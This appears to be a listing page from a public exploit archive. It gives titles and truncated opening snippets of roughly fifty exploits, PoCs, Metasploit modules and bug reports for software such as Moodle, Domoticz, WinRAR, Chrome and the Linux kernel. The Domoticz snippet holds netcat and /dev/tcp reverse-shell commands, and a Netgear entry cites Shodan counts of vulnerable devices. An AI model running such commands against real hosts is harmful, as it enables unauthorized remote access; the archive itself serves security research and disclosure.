Agent Tesla Botnet - Information Disclosure
Exploit Title: Agent Tesla Botnet - Information Disclosure Vulnerability Google Dork: n/a Date: 26/11/2018 Exploit Author: n4pst3r Vendor Homepage: unkn0wn Software Link: http://www.agenttesla.com/ ¡ Down ! Version: unkn0wn Tested on: Windows 10, debian 7 CVE : n/a Greetz: Shell.root,...
SpotAuditor 5.2.6 - 'Name' Denial of Service (PoC)
Exploit Title: SpotAuditor 5.2.6 - 'Name' Denial of Service PoC Discovery by: Victor Mondragón Discovery Date: 2019-04-27 Vendor Homepage: www.nsauditor.com Software Link: http://spotauditor.nsauditor.com/downloads/spotauditorsetup.exe Tested Version: 5.2.6 Tested on: Windows 10 Single...
Moodle 3.6.3 - 'Install Plugin' Remote Command Execution (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "Moodle 3.6.3 - 'Install Plugin' Remote Command Execution", 'Description' = %q This module exploits a command execution vulnerability in Moodle...
Netgear DGN2200 / DGND3700 - Admin Password Disclosure
/bin/bash PoC based on CVE-2016-5649 created by Social Engineering Neo. Long Method: https://www.youtube.com/watch?v=f3awG0XPKAs https://www.shodan.io/search?query=DGN2200 = 2,325 possible vulnerable devices. https://www.shodan.io/search?query=DGND3700 = 555 possible vulnerable devices. A...
Veeam ONE Reporter 9.5.0.3201 - Persistent Cross-site Scripting (Add/Edit Widget)
Exploit Title: Veeam ONE Reporter - Stored Cross-site Scripting Add/Edit Widget Exploit Author: Seyed Sadegh Khatami Website: https://www.cert.ir Date: 2019-04-27 Google Dork: N/A Vendor Homepage: https://www.veeam.com/ Software Link: https://www.veeam.com/virtual-server-management-one-free.html...
Linux - Missing Locking Between ELF coredump code and userfaultfd VMA Modification
elf_core_dump has a comment back from something like 2.5.43-C3 that says: /* We no longer stop all VM operations. This is because those processes that could possibly change map_count or the mmap / vma pages are now blocked in do_exit on current finishing this core dump. Only ptrace can touch these memo...
DeviceViewer 3.12.0.1 - 'user' SEH Overflow
Exploit Title: DeviceViewer v3.12.0.1 username field SEH overflow PoC Discovery Date: 25/04/2019 Exploit Author: Hayden Wright Vendor Homepage: www.sricam.com/ Software Link: http://download.sricam.com/Manual/DeviceViewer.exe Version: v3.12.0.1 Tested on: Windows XP Pro x64, Windows 7 32bit CVE :...
Domoticz 4.10577 - Unauthenticated Remote Command Execution
#!/usr/bin/env python # -*- coding: utf-8 -*- Exploit Title: Unauthenticated Remote Command Execution on Domoticz & /dev/tcp/172.17.0.1/4444 0&1 &' ./exploit.py -zipcmd http://localhost:8080/ 'nc 10.0.2.2 4444 -e /bin/bash &' import argparse import requests import urllib import base64 import json impo...
Spring Cloud Config 2.1.x - Path Traversal (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Spring Cloud Config Server Directory Traversal', 'Description' = %q This module exploits an unauthenticated directory traversal vulnerability whi...
Veeam ONE Reporter 9.5.0.3201 - Persistent Cross-Site Scripting
Exploit Title: Veeam ONE Reporter - Stored Cross-site Scripting Stored XSS Exploit Author: Seyed Sadegh Khatami Website: https://www.cert.ir Date: 2019-04-27 Google Dork: N/A Vendor Homepage: https://www.veeam.com/ Software Link: https://www.veeam.com/virtual-server-management-one-free.html...
Freefloat FTP Server 1.0 - 'STOR' Remote Buffer Overflow
Exploit Title: Free Float FTP 1.0 "STOR" Remote Buffer Overflow Google Dork: N/A Date: 4/26/2019 Exploit Author: Kevin Randall Vendor Homepage: Software Link: http://www.freefloat.com/software/freefloatftpserver.zip Version: Firmware: Free Float FTP 1.0 Tested on: Windows XP Professional Service...
HumHub 1.3.12 - Cross-Site Scripting
Exploit Title: HumHub 1.3.12 - Cross-Site Scripting Exploit Author: Kağan EĞLENCE Vendor Homepage: https://humhub.org/ Version: 1.3.12 CVE : CVE-2019-11564 Url : http://localhost/humhub-1.3.12/protected/vendor/codeception/codeception/tests/data/app/view/index.php Vulnerable File :...
Pimcore < 5.71 - Unserialize Remote Code Execution (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "Pimcore Unserialize RCE", 'Description' = %q This module exploits a PHP unserialize in Pimcore before 5.7.1 to execute arbitrary code. An...
AIS logistics ESEL-Server - Unauthenticated SQL Injection Remote Code Execution (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'AIS logistics ESEL-Server Unauth SQL Injection RCE', 'Description' = %q This module will execute an arbitrary payload on an "ESEL" server used by...
Freefloat FTP Server 1.0 - 'SIZE' Remote Buffer Overflow
Exploit Title: Free Float FTP 1.0 "SIZE" Remote Buffer Overflow Google Dork: N/A Date: 4/26/2019 Exploit Author: Kevin Randall Vendor Homepage: Software Link: http://www.freefloat.com/software/freefloatftpserver.zip Version: Firmware: Free Float FTP 1.0 Tested on: Windows XP Professional Service...
NSauditor 3.1.2.0 - 'Name' Denial of Service (PoC)
Exploit Title: NSauditor 3.1.2.0 - 'Name' Denial of Service PoC Discovery by: Victor Mondragón Discovery Date: 2019-04-24 Vendor Homepage: www.nsauditor.com Software Link: http://www.nsauditor.com/downloads/nsauditorsetup.exe Tested Version: 3.1.2.0 Tested on: Windows 7 x64 Service Pack 1 Steps t...
NSauditor 3.1.2.0 - 'Community' Denial of Service (PoC)
Exploit Title: NSauditor 3.1.2.0 - 'Community' Denial of Service PoC Discovery by: Victor Mondragón Discovery Date: 2019-04-24 Vendor Homepage: www.nsauditor.com Software Link: http://www.nsauditor.com/downloads/nsauditorsetup.exe Tested Version: 3.1.2.0 Tested on: Windows 7 x64 Service Pack 1...
Apache Pluto 3.0.0 / 3.0.1 - Persistent Cross-Site Scripting
Exploit Title: Stored XSS Date: 25-04-2019 Exploit Author: Dhiraj Mishra Vendor Homepage: https://portals.apache.org/pluto Software Link: https://portals.apache.org/pluto/download.html Version: 3.0.0, 3.0.1 Tested on: Ubuntu 16.04 LTS CVE: CVE-2019-0186 References:...
systemd - DynamicUser can Create setuid Binaries when Assisted by Another Process
This bug report describes a bug in systemd that allows a service with DynamicUser in collaboration with another service or user to create a setuid binary that can be used to access its UID beyond the lifetime of the service. This bug probably has relatively low severity, given that there aren't...
Backup Key Recovery 2.2.4 - Denial of Service (PoC)
Exploit Title: Backup Key Recovery 2.2.4 - 'Name' Denial of Service PoC Discovery by: Victor Mondragón Discovery Date: 2019-04-24 Vendor Homepage: www.nsauditor.com Software Link: http://www.nsauditor.com/downloads/backeyrecoverysetup.exe Tested Version: 2.2.4 Tested on: Windows 7 x64 Service Pac...
RARLAB WinRAR 5.61 - ACE Format Input Validation Remote Code Execution (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework TODO: add other non-payload files class MetasploitModule 'RARLAB WinRAR ACE Format Input Validation Remote Code Execution', 'Description' = %q In WinRAR versions prior t...
Lavavo CD Ripper 4.20 - 'License Activation Name' Buffer Overflow (SEH)
Exploit Title: Lavavo CD Ripper 4.20 Local Seh Exploit Date: 25.04.2019 Vendor Homepage:https://www.lavavosoftware.com Software Link: https://lavavo-cd-ripper.jaleco.com/download Exploit Author: Achilles Tested Version: 4.20 Tested on: Windows XP SP3 EN Windows 7 Sp1 x64 1.- Run python code :...
HeidiSQL 10.1.0.5464 - Denial of Service (PoC)
Exploit Title: HeidiSQL Portable 10.1.0.5464 - Denial of Service PoC Discovery by: Victor Mondragón Discovery Date: 2019-04-24 Vendor Homepage: https://www.heidisql.com/ Software Link: https://www.heidisql.com/downloads/releases/HeidiSQL10.164Portable.zip Tested Version: 10.1.0.5464 Tested on:...
JioFi 4G M2S 1.0.2 - 'mask' Cross-Site Scripting
Exploit Title: cgi-bin/qcmap_web_cgi on JioFi 4G M2S 1.0.2 devices has XSS and HTML injection via the mask POST parameter. Exploit Author: Vikas Chaudhary Date: 21-01-2019 Vendor Homepage: https://www.jio.com/ Hardware Link:...
osTicket 1.11 - Cross-Site Scripting / Local File Inclusion
Exploit Title: osTicket v1.11 - Cross-Site Scripting to Local File Inclusion Date: 09.04.2019 Exploit Author: Özkan Mustafa Akkuş AkkuS @ehakkus Contact: https://pentest.com.tr Vendor Homepage: https://osticket.com Software Link: https://github.com/osTicket/osTicket References:...
JioFi 4G M2S 1.0.2 - Denial of Service
Exploit Title: cgi-bin/qcmap_web_cgi on JioFi 4G M2S 1.0.2 devices allows a DoS Hang via the mask POST parameter Exploit Author: Vikas Chaudhary Date: 21-01-2019 Vendor Homepage: https://www.jio.com/ Hardware Link:...
AnMing MP3 CD Burner 2.0 - Denial of Service (PoC)
Exploit Title: AnMing MP3 CD Burner 2.0 Local Dos Exploit Date: 25.04.2019 Vendor Homepage:http://www.ddz1977.com/ Software Link: https://files.downloadnow.com/s/software/10/56/16/74/anmingsetup.zip?token=1556228877063f2dc0aed064ee5d13374d8509661c&fileName=anmingsetup.zip Exploit Author: Achilles...
Google Chrome 72.0.3626.121 / 74.0.3725.0 - 'NewFixedDoubleArray' Integer Overflow
VULNERABILITY DETAILS https://cs.chromium.org/chromium/src/v8/src/heap/factory.cc?rcl=dd689541d3815d64b4b39f6a41603248c71aa00e&l=496 Handle<FixedArrayBase> Factory::NewFixedDoubleArray(int length, PretenureFlag pretenure) { DCHECK_LE(0, length); if (length == 0) return empty_fixed_array(); if (length...
VirtualBox 6.0.4 r128413 - COM RPC Interface Code Injection Host Privilege Escalation
VirtualBox: COM RPC Interface Code Injection Host EoP Platform: VirtualBox 6.0.4 r128413 x64 on Windows 10 1809 Class: Elevation of Privilege Summary: The hardened VirtualBox process on a Windows host doesn’t secure its COM interface leading to arbitrary code injection and EoP. Description: This...
Linux - Missing Locking in Siemens R3964 Line Discipline Race Condition
The Siemens R3964 line discipline code in drivers/tty/n_r3964.c has a few races around its ioctl handler; for example, the handler for R3964_ENABLE_SIGNALS just allocates and deletes elements in a linked list with zero locking. This code is reachable by an unprivileged user if the line discipline ...
systemd - Lack of Seat Verification in PAM Module Permits Spoofing Active Session to polkit
As documented at , for any action, a polkit policy can specify separate levels of required authentication based on whether a client is: - in an active session on a local console - in an inactive session on a local console - or neither This is expressed in the policy using the elements "allow_any",...
Linux - 'page->_refcount' Overflow via FUSE
Linux: page->_refcount overflow via FUSE with 140GiB RAM usage Tested on: Debian Buster distro kernel "4.19.0-1-amd64 #1 SMP Debian 4.19.12-1 (2018-12-22)" KVM guest with 160000MiB RAM A while back, there was some discussion about possible overflows of the _mapcount in struct page, started by Daniel...
Ross Video DashBoard 8.5.1 - Insecure Permissions
Ross Video DashBoard 8.5.1 Insecure Permissions Vendor: Ross Video Ltd. Product web page: https://www.rossvideo.com Affected version: 8.5.1 Summary: DashBoard is a free and open platform from Ross Video for facility control and monitoring that enables users to quickly build unique, tailored Custo...
Google Chrome 73.0.3683.103 V8 JavaScript Engine - Out-of-Memory in Invalid Table Size Denial of Service (PoC)
var arr1 = 0,1; function ObjCreatemake this.make = make; var obj1 = new ObjCreate; function main arr1.reducef3; Object.getOwnPropertyDescriptorsArray99.joinobj1.make; function f3 obj1"make" = RegExpArray60000.join"CCC";...
74CMS 5.0.1 - Cross-Site Request Forgery (Add New Admin User)
Exploit Title: 74CMS v5.0.1 has a CSRF vulnerability to add a new admin user Date: 2019-04-14 Exploit Author: ax8 Vendor Homepage: https://github.com/Li-Siyuan Software Link: http://www.74cms.com/download/index.html Version: v5.0.1 CVE : CVE-2019-11374 74CMS v5.0.1 has a CSRF vulnerability to add...
Ease Audio Converter 5.30 - '.mp4' Denial of Service (PoC)
Exploit Title: Ease Audio Converter 5.30 Audio Cutter Dos Exploit Date: 19.04.19 Vendor Homepage:http://www.audiotool.net/download.htm Software Link: http://www.audiotool.net/download/audioconverter.exe Exploit Author: Achilles Tested Version: 5.30 Tested on: Windows 7 x64 Sp1 1.- Run the python...
WordPress Plugin Contact Form Builder 1.0.67 - Cross-Site Request Forgery / Local File Inclusion
Exploit Title: Contact Form Builder CSRF → LFI Date: 2019-03-17 Exploit Author: Panagiotis Vagenas Vendor Homepage: http://web-dorado.com/ Software Link: https://wordpress.org/plugins/contact-form-builder Version: 1.0.67 Tested on: WordPress 5.1.1 Description ----------- Plugin implements the...
Msvod 10 - Cross-Site Request Forgery (Change User Information)
Exploit Title: Msvod v10 has a CSRF vulnerability to change user information Date: 2019-04-14 Exploit Author: ax8 Vendor Homepage: https://github.com/Li-Siyuan Software Link: https://www.msvodx.com/ Version: v10 CVE : CVE-2019-11375 Msvod v10 has a CSRF vulnerability to change user information vi...
ManageEngine Applications Manager 14.0 - Authentication Bypass / Remote Command Execution (Metasploit)
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "ManageEngine Applications Manager %q This module exploits sqli and command injection vulnerability in the ManageEngine AM 14 and prior versions. I...
LabF nfsAxe 3.7 Ping Client - 'Host IP' Buffer Overflow (Direct Ret)
#!/usr/bin/python Exploit Title: LabF nfsAxe 3.7 Ping Client - Buffer Overflow Vanilla Date: 20-04-2019 Exploit Author: Dino Covotsos - Telspace Systems Vendor Homepage: http://www.labf.com/nfsaxe Version: 3.7 Software Link : http://www.labf.com/download/nfsaxe.exe Contact: [email protected]...
QNAP myQNAPcloud Connect 1.3.4.0317 - 'Username/Password' Denial of Service
#!/usr/bin/python Exploit Title: QNAP myQNAPcloud Connect "Username/Password" DOS Date: 19/04/2019 Exploit Author: Dino Covotsos - Telspace Systems Vendor Homepage: https://www.qnap.com Version: 1.3.4.0317 and below are vulnerable Software Link: https://www.qnap.com/en/utilities/essentials Contact...
UliCMS 2019.2 / 2019.1 - Multiple Cross-Site Scripting
Exploit Title: UliCMS - 2019.2 , 2019.1 - Multiple Cross-Site Scripting Google Dork: intext:"by UliCMS" Exploit Author: Kağan EĞLENCE Vendor Homepage: https://en.ulicms.de/ Version: 2019.2 , 2019.1 CVE : CVE-2019-11398 Vulnerability 1 Url :...
Oracle Business Intelligence 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - Directory Traversal
Exploit Title: Directory traversal in Oracle Business Intelligence Date: 16.04.19 Exploit Author: @vah13 Vendor Homepage: http://oracle.com Software Link: https://www.oracle.com/technetwork/middleware/bi-enterprise-edition/downloads/index.html Version: 11.1.1.9.0, 12.2.1.3.0, 12.2.1.4.0 Tested on...
SystemTap 1.3 - MODPROBE_OPTIONS Privilege Escalation (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'SystemTap MODPROBE_OPTIONS Privilege Escalation', 'Description' = %q This module attempts to gain root privileges by exploiting a vulnerability in...
Oracle Business Intelligence / XML Publisher 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - XML External Entity Injection
Exploit Title: XXE in Oracle Business Intelligence and XML Publisher Date: 16.04.19 Exploit Author: @vah13 Vendor Homepage: http://oracle.com Software Link: https://www.oracle.com/technetwork/middleware/bi-enterprise-edition/downloads/index.html Version: 11.1.1.9.0, 12.2.1.3.0, 12.2.1.4.0 Tested...
Atlassian Confluence Widget Connector Macro - Velocity Template Injection (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "Atlassian Confluence Widget Connector Macro Velocity Template Injection", 'Description' = %q Widget Connector Macro is part of Atlassian Confluen...
Netwide Assembler (NASM) 2.14rc15 - NULL Pointer Dereference (PoC)
Exploit Title: Netwide Assembler NASM 2.14rc15 NULL Pointer Dereference PoC Date: 2018-09-05 Exploit Author: Fakhri Zulkifli Vendor Homepage: https://www.nasm.us/ Software Link: https://www.nasm.us/pub/nasm/releasebuilds/?C=M;O=D Version: 2.14rc15 and earlier Tested on: 2.14rc15 CVE :...
Evernote 7.9 - Code Execution via Path Traversal
Exploit Title: Code execution via path traversal Date: 17-04-2019 Exploit Author: Dhiraj Mishra Vendor Homepage: http://evernote.com/ Software Link: https://evernote.com/download Version: 7.9 Tested on: macOS Mojave v10.14.4 CVE: CVE-2019-10038 References:...
ManageEngine Applications Manager 11.0 < 14.0 - SQL Injection / Remote Code Execution (Metasploit)
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "ManageEngine Applications Manager 11.0 %q This module exploits sql and command injection vulnerability in the ManageEngine AM 14 and prior version...
LibreOffice < 6.0.7 / 6.1.3 - Macro Code Execution (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'LibreOffice Macro Code Execution', 'Description' = %q LibreOffice comes bundled with sample macros written in Python and allows the ability to bi...